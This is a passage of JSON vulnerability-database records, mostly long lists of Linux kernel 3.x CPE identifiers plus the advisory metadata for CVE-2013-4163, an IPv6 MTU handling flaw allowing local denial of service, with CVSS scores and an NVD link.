"cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:55", "description": "The ip6_append_data_mtu function in net/ipv6/ip6_output.c in the IPv6 implementation in the Linux kernel through 3.10.3 does not properly maintain information about whether the IPV6_MTU setsockopt option had been specified, which allows local users to cause a denial of service (BUG and system crash) via a crafted application that uses the UDP_CORK option in a setsockopt system call.", "edition": 6, "cvss3": {}, "published": "2013-07-29T13:59:00", "title": "CVE-2013-4163", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4163"], "modified": "2013-10-02T04:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-4163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4163", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", 